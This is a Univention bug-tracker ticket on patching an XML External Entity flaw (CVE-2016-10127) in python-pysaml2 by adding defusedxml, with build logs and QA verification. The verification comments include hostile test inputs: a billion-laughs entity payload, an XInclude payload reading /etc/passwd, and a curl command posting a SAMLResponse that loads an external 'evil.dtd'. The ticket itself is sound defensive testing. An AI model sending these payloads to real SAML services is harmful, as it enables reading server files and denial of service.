Bug 43393 - python-pysaml2: XML External Entity issue (4.1)
python-pysaml2: XML External Entity issue (4.1)
Product: UCS
Classification: Unclassified
Component: Security updates
UCS 4.1
Other Linux
: P5 normal (vote)
: UCS 4.1-4-errata
Assigned To: Arvid Requate
Florian Best
: 43315 (view as bug list)
Depends on:
  Show dependency treegraph
Reported: 2017-01-21 19:20 CET by Arvid Requate
Modified: 2019-06-06 12:55 CEST (History)
2 users (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score: 7.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
requate: Patch_Available+

CVE-2016-10127_fix-xxe-in-xml-parsing.patch (8.54 KB, patch)
2017-01-21 19:20 CET, Arvid Requate
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Arvid Requate univentionstaff 2017-01-21 19:20:51 CET
Created attachment 8362 [details]

Upstream Debian Jessie package version 2.0.0-1+deb8u1 fixes this issue:

Matias P. Brutti discovered that python-pysaml2, a Python implementation of the Security Assertion Markup Language 2.0, did not correctly sanitize the XML messages it handled. This allowed a remote attacker to perform XML External Entity attacks, leading to a wide range of exploits (CVE-2016-10127)

In UCS 4.1 we have version 2.4.0-2.
Comment 1 Florian Best univentionstaff 2017-01-21 21:28:54 CET
*** Bug 43315 has been marked as a duplicate of this bug. ***
Comment 2 Florian Best univentionstaff 2017-01-21 21:33:41 CET
We need to cherry-pick https://packages.debian.org/de/jessie/python-defusedxml.
Comment 3 Arvid Requate univentionstaff 2017-02-14 23:39:24 CET
* repo_admin.py -U -d jessie -r 4.1-0-0 -s errata4.1-4 -p defusedxml

Successful build
Package: defusedxml
Version: 0.4.1-2.1.201702142211
Branch: ucs_4.1-0
Scope: errata4.1-4

* repo_admin.py --cherrypick --release 4.1-0 \
  --releasedest 4.1-0 --dest errata4.1-4 --package python-pysaml2

Package: python-pysaml2
Version: 2.4.0-2.4.201702142305
Branch: ucs_4.1-0
Scope: errata4.1-4
= /var/univention/buildsystem2/logs/ucs_4.1-0-0-errata4.1-4/python-pysaml2_2.4.0-2.4.201702142305.log.bz2

* Comparing the log file with the UCS 4.1-0 build looks ok. The 6 new test cases run successfully.

* python-defusedxml has been added to the ucs_4.1-0-ucs4.1-4.txt trigger list as described in the Wiki (Errata-Updates). The package is now listed in buildsystem2/cd-contents/ucs_4.1-4_*.maintained

* Advisories: defusedxml.yaml, python-pysaml2.yaml
Comment 4 Florian Best univentionstaff 2017-02-15 13:07:36 CET
OK: grep ElementTree $(dpkg -L python-pysaml2 | sort) 2>/dev/null | grep fromstring | grep -v defusedxml

>>> import saml2
>>> xml = '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n<!ELEMENT lolz (#PCDATA)>\n<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n]>\n<lolz>&lol1;</lolz>\n'
>>> saml2.create_class_from_xml_string(None, xml)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/saml2/__init__.py", line 86, in create_class_from_xml_string
    tree = defusedxml.ElementTree.fromstring(xml_string)
  File "/usr/lib/python2.7/dist-packages/defusedxml/common.py", line 159, in fromstring
  File "/usr/lib/python2.7/xml/etree/ElementTree.py", line 1641, in feed
    self._parser.Parse(data, 0)
  File "/usr/lib/python2.7/dist-packages/defusedxml/ElementTree.py", line 95, in defused_entity_decl
    raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)
defusedxml.common.EntitiesForbidden: EntitiesForbidden(name='lol', system_id=None, public_id=None)

OK: not possible to get file contents with e.g.:
<root xmlns:xi="http://www.w3.org/2001/XInclude">\n  <xi:include href="/etc/passwd" parse="text" />\n</root>

OK: SAML login and logout via UMC still works
OK: ucs-test -s saml -E dangerous
Comment 5 Florian Best univentionstaff 2017-02-15 19:44:33 CET
Just for myself:

urllib.quote('''<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> %payload;]>'''.encode('base64').strip())

curl -ik 'https://xen3.school.local/univention/saml/' -H 'Content-Type: application/x-www-form-urlencoded' --data 'SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgcm9vdCBbIDwh%0ARU5USVRZICUgcGF5bG9hZCBTWVNURU0gImh0dHA6Ly9sb2NhbGhvc3Q6ODAwMC9ldmlsLmR0ZCI%2B%0AICVwYXlsb2FkO10%2B'